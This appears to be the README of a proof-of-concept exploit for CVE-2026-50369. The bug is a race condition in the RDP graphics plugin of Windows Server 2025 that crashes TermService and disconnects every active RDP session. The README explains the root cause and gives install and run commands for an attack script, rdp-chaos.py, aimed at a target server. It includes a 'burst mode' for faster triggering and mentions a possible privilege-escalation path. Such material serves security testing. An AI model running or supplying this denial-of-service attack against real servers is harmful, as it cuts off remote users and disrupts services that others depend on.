
Proof-of-concept exploit for CVE-2026-50369, demonstrating the vulnerability and providing a working exploit for security testing and verification.
reproducer for a TOCTOU race condition in rdpcorets.dll!CRdpPipeGfxPlugin::Enable on Windows Server 2025 RDS Session Hosts.
i reported this as a DoS; the code-path seem to somehow also enable EoP. this reproducer is a PoC for the DoS path alone.
Enable reads a COM interface pointer at this+0x60 twice without synchronization. TerminateInstance clears the same field outside its own critical section scope. Both execute concurrently on the NT threadpool via PnP device arrival and removal work items. The second read dereferences null → access violation → TermService crash → all active RDP sessions disconnected.
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3 # or freerdp2-x11
# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt
# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt
# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
--burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030